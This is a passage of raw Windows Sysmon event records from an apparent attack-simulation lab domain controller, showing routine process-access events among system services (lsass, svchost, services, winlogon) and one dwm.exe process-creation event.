10341000x8000000000000000837Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.871{5D479F2C-16A1-5F84-0C00-000000007F01}6121064C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000836Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.871{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000835Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.871{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000834Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.871{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000833Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.855{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-0F00-000000007F01}1136C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000832Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.855{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-0F00-000000007F01}1136C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000831Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.855{5D479F2C-169F-5F84-0A00-000000007F01}856944C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000830Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.855{5D479F2C-16A1-5F84-0E00-000000007F01}10921372C:\Windows\system32\LogonUI.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\logoncontroller.dll+2dfb5|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000829Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.855{5D479F2C-16A1-5F84-0C00-000000007F01}612924C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000828Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0A00-000000007F01}856944C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1300-000000007F01}1296C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000827Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}612732C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1300-000000007F01}1296C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000826Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0800-000000007F01}728824C:\Windows\system32\csrss.exe{5D479F2C-16A1-5F84-1500-000000007F01}1324C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000825Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0900-000000007F01}7881080C:\Windows\system32\winlogon.exe{5D479F2C-16A1-5F84-1500-000000007F01}1324C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000824Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.849{5D479F2C-16A1-5F84-1500-000000007F01}1324C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-1{5D479F2C-16A1-5F84-0CB4-000000000000}0xb40c1SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000823Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}612732C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000822Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}612732C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000821Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000820Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000819Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0A00-000000007F01}8561132C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000818Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1c030|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000817Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000816Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000815Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16A1-5F84-1300-000000007F01}1296C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000814Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-169F-5F84-0A00-000000007F01}856940C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1300-000000007F01}1296C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000813Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000812Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.840{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000811Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 